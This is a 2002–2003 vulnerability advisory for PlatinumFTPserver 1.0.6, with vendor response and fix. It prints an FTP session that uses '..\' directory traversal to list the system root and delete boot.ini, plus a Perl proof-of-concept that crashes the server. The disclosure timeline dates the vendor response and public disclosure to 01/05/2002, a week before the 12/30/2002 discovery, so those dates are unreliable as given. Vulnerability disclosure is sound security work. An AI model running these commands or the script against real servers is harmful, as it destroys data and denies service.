Multiple vulnerabilities found in
                        PlatinumFTPserver V1.0.6
                 PlatinumFTPserver (C)2002 BYTE/400 LTD
                                        
                         Discovered by Matrix
                      http://www.infowarfare.dk
------------------------------------------------------------------------

SUMMARY

PlatinumFTPserver simplifies management of all your Ftp clients with regards
to sending and receiving program and data files over an IP connection.
Working within a control screen, PlatinumFTPserver gives you total
control: you can create and manage users, user groups and root directories.
You can define what Ftp Commands the users or groups can access.
PlatinumFTPserver provides activity logs, client connection details, file
and megabyte graphical statistics by session and day, virtual folders and a
built in Web Browser. The server engine runs as an application on Windows 9x
and a service under NT/2K/XP.
PlatinumFTPserver can bind to one or all IP addresses within the PC. All
configuration data for the server including password and description fields
are encrypted using the powerful Blowfish cipher. Clients can request files
be zipped before transfer, execute scripts created with the VBscript editor
and also access the shell process.
A vulnerability in the product allows remote attackers to cause
the server to traverse into directories that reside outside the bounding
FTP root directory, delete files and preform a DoS attack on the server.

DETAILS

Vulnerable systems:
 * PlatinumFTPServer version 1.0.6
   Also with installed patch released 14. dec. 2002

Immune systems:
 * PlatinumFTPServer version 1.0.7

PlatinumFTP failure to filter out "..\" sequences in command requests allows
remote users to break out of restricted directories and gain read access
to the system directory structure; Possibility for deleting files and
preforming
a DoS attack on the server.

The following transcript demonstrates a sample exploitation of the
vulnerabilities:

C:\>ftp 192.168.1.199
Connected to 192.168.1.199.
220-PlatinumFTPserver V1.0.6
220-PlatinumFTPserver (C)2002 BYTE/400 LTD
220-
220 Enter login details
User (192.168.1.199:(none)): anonymous
331 Password required for anonymous.
Password:
230-Send comments to supportPlatinumFTP.com
230-Date 12/30/02, Time 1:44:34 PM.
230 Storage available 1,954,179,072 Bytes.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> cd ..
550 Access denied
ftp> dir ..\..\..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group 279 Dec 23 12:16 boot.ini
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler
til Windows Update
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 134217728 Dec 30 13:43 pagefile.sys
drwxr-xr-x 1 User Group 0 Dec 30 13:23 Program Files
drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group 0 Dec 30 13:08 TEMP
drwxr-xr-x 1 User Group 0 Dec 30 13:55 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,00Seconds 1181000,00Kbytes/sec.
ftp> delete ..\..\..\..\boot.ini
250 delete command successful.
ftp> dir ..\..\..\..\
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 AUTOEXEC.BAT
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 CONFIG.SYS
drwxr-xr-x 1 User Group 0 Dec 23 12:25 I386
drwxr-xr-x 1 User Group 0 Dec 23 22:22 Inetpub
drwxr-xr-x 1 User Group 0 Dec 23 21:49 Installationsfiler
til Windows Update
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 IO.SYS
-rwxr-xr-x 1 User Group 0 Dec 23 12:17 MSDOS.SYS
drwxr-xr-x 1 User Group 0 Dec 23 21:25 Multimedia Files
-rwxr-xr-x 1 User Group 26816 Dec 23 22:30 NTDETECT.COM
-rwxr-xr-x 1 User Group 156496 Dec 23 22:30 ntldr
drwxr-xr-x 1 User Group 0 Dec 23 12:36 OptionPack
-rwxr-xr-x 1 User Group 134217728 Dec 30 15:24 pagefile.sys
drwxr-xr-x 1 User Group 0 Dec 30 15:19 Program Files
drwxr-xr-x 1 User Group 0 Dec 23 12:24 RECYCLER
drwxr-xr-x 1 User Group 0 Dec 24 00:08 TEMP
drwxr-xr-x 1 User Group 0 Dec 30 16:30 WINNT
226 Listing complete.
ftp: 1181 bytes received in 0,12Seconds 9,76Kbytes/sec.
ftp> cd /../..
ftp> bye
221 Goodbye.

Analysis:
1: DIR Command vulnerability
Any remote user with legitimate or anonymous access to an affected Platinum's
FTP server can exploit the vulnerability and freely browse the target
system's directory structure. Such information could prove useful in
subsequent attacks as well as provide information useful for an attacker
to successfully conduct social engineering attacks.

2: DELETE Command vulnerability
With this command it is possible to the attacker to destroy data on the server.
as you can see in the exploiting part it is fairly simple to do so.

3: CD Command vulnerability
The last command "cd /../.." will cause a DoS attack on the server where
the server will use 99% og the CPU time.

Exploit code:
------------------------------------- CUT HERE --------------------------------
---------
#!/usr/bin/perl
#
# PlatinumFTPserver V1.0.6 DoS attack
# http://www.PlatinumFTP.com
# Matrix - Matrixinfowarfare.dk
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
#
#
use Net::FTP;

    
$target = shift() || die "usage: target ip";
my $user = "anonymous";
my $pass = "crash\burn.com";

system('cls');
print "PlatinumFTPserver V1.0.6 DoS attack\n";
print "Trying to connect to target system at: $target...\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not
connect: $!";
$ftp->login($user, $pass) || die "could not login: $!";
$ftp->cwd("/");

print "Trying to crash the FTP service...\n";
$ftp->cwd("cd /../..");
$ftp->quit;

------------------------------------- CUT HERE --------------------------------
---------

Detection:
PlatinumFTPServer version 1.0.6 is vulnerable to the above-described attacks.
Earlier versions may be susceptible as well. To determine if a specific
implementation is vulnerable, experiment by following the above
transcript.

Vendor response:
I have patched the server so that no reference to ../ can be done on any
command issued from the client.
Thanks for notifying me of this problem
Regards
Chris

PlatinumFTPServer version 1.0.7 fixes this issue. The latest version is
available from http://www.platinumftp.com/platinumftpserver.php

Disclosure timeline:
12/30/2002 Found the Vulnerability.
12/30/2002 Author notified (supportPlatinumFTP.com)
01/05/2002 Responses received from supportPlatinumFTP.com
01/05/2002 Public Disclosure.

ADDITIONAL INFORMATION
The vulnerability was discovered by <mailto:matrixinfowarfare.dk> Matrix

-------------------------------------------------
This mail sent through IMP: http://horde.org/imp/

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]